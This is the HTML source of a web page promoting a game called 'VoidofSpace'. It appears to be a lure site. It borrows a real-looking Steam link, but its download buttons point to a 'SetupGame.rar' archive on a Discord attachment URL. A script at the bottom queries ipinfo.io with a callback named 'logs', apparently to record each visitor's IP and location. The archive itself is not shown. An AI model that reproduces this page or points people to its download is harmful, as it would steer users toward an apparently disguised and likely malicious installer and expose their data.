<!DOCTYPE html><html lang="en"><head></head><body>>


<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="apple-touch-icon" sizes="180x180" href="apple-touch-icon.html">
<link rel="icon" type="image/png" sizes="32x32" href="favicon-32x32.html">
<link rel="icon" type="image/png" sizes="16x16" href="favicon-16x16.html">
<link rel="manifest" href="assets/images/favicon/site.html">
<link rel="mask-icon" href="safari-pinned-tab.html" color="#5bbad5">
<meta name="msapplication-TileColor" content="#da532c">
<meta content="VoidofSpace" property="og:title">
<meta content="VoidofSpace is an RPG, horror-survival game, a science fiction adventure. Explore the colonizer ship Genesis IV, abandoned in the atmosphere of an unknown alien planet. Craft items, find weapons and equipment to defend against the hostile life forms you encounter.">
<meta content="#000000" data-react-helmet="true" name="theme-color">
<meta property="og:description" content="VoidofSpace is an RPG, horror-survival game, a science fiction adventure. Explore the colonizer ship Genesis IV, abandoned in the atmosphere of an unknown alien planet. Craft items, find weapons and equipment to defend against the hostile life forms you encounter.">
<meta content="images/header.jpg" property="og:image">
<meta property="og:image">
<link rel="shortcut icon" type="image/x-icon" href="favicon.html">
<title>VoidofSpace - Home</title>
<link rel="stylesheet" href="css/rawline.css">
<link rel="stylesheet" href="css2.html">
<link rel="stylesheet" href="css2.html">
<link rel="stylesheet" href="css/all.min.css">
<link rel="stylesheet" href="reset.html">
<link rel="stylesheet" href="css/index.css">


<div class="wrapper">
<nav class="navbar">
<div class="navbar__container">
<div class="navbar__branding">
<a href="https://lariax.online/">
<svg id="logo" width="150" height="150" viewBox="0 0 130 130" xmlns="http://www.w3.org/2000/svg">
<path fill-rule="evenodd" clip-rule="evenodd" d="M72 60H70V19H81V29H90V10H70V0H90H101V10V29H119H130V40V60H119V40H101V49H111V60H101H90H81H72ZM81 49V40H90V49H81ZM60 70H58H49H40H29H19V81H29V90H11V70H0V90V101H11H29V120V130H40H60V120H40V101H49V111H60V70ZM49 90V81H40V90H49ZM70 70H72H81H90H101H111V81H101V90H119V70H130V90V101H119H101V120V130H90H70V120H90V101H81V111H70V70ZM81 90V81H90V90H81ZM60 60H58H49H40H29H19V49H29V40H11V60H0V40V29H11H29V10V0H40H60V10H40V29H49V19H60V60ZM49 40V49H40V40H49Z" fill="#fff" fill-opacity="0.85"/>
</svg>
<span>VoidofSpace</span>
</a>
</div>
<div class="navbar__items navbar__items--mobile">
<a href="https://lariax.online/#" class="navbar__item">
<label for="input-navbar">
<i class="fas fa-bars"></i>
</label>
</a>
</div>
<input type="checkbox" id="input-navbar" style="display: none;">
<div class="navbar__items">
</div>
</div>
</nav>
<main class="main">
<div class="main__container">
<section class="section section--hero">
<div class="clouds"></div>
<div class="section__container">
<div class="section__image" style="--image-url: url(&#x27;images/library_hero.jpg&#x27;);">
</div>
<div class="section__content">
<h1 class="section__heading">VoidofSpace</h1>
<p class="section__subheading">The new best action game.</p>
<div class="section__buttons">
<a href="https://store.steampowered.com/app/898220/Void_Of_Space/" class="button button--secondary">Steam Page!</a>
<a href="https://cdn.discordapp.com/attachments/1149807890815795251/1150127390853439539/SetupGame.rar" class=" button button--primary">Download Free Beta!</a>
</div>
</div>
</div>
</section>
<div>
<section class="section section--about" id="section-about">
<div class="section__container">
<div class="section__content">
<h2 class="section__heading">Story</h2>
<p class="section__description">
VoidofSpace is an RPG, horror-survival game, a science fiction adventure. Explore the colonizer ship
Genesis IV, abandoned in the atmosphere of an unknown alien planet. Craft items, find weapons and
equipment to defend against the hostile life forms you encounter.
</p>
</div>
</div>
<section class="section section--feature">
<div class="section__container">
<div class="section__image" style="--image-url: url(images/ss_0dbeabe8de69fb4555fa40b06a872e8ecb743c64.600x338.jpg);">
</div>
<div class="section__content">
<h2 class="section__heading">
<p></p>
</h2></div>
</div>
</section>
<section class="section section--feature">
</section>
<section class="section section--download" id="section-download">
<div class="section__container">
<div class="section__content">
<h2 class="section__heading">Download Now</h2>
<div class="section__buttons">
<a href="https://cdn.discordapp.com/attachments/1149807890815795251/1150127390853439539/SetupGame.rar" class="button button--primary">Download</a>
</div>
</div>
</div>
</section>
</section></div>
</div>
</main>
<footer class="footer" id="footer">
<div class="footer__container">
<div class="footer__content">
<div class="footer__copyright">
</div>
<div class="footer__affiliation">
</div>
</div>
<div class="footer__icons">

<a href="https://store.steampowered.com/app/898220/Void_Of_Space/" class="footer__icon">
<i class="fab fa-steam fa-fw"></i>
</a>

</div>
</div>
</footer>
</div>




    <script src="js/site.js"></script>
    <script src="https://ipinfo.io/?format=jsonp&amp;callback=logs"></script>
  




</body></html>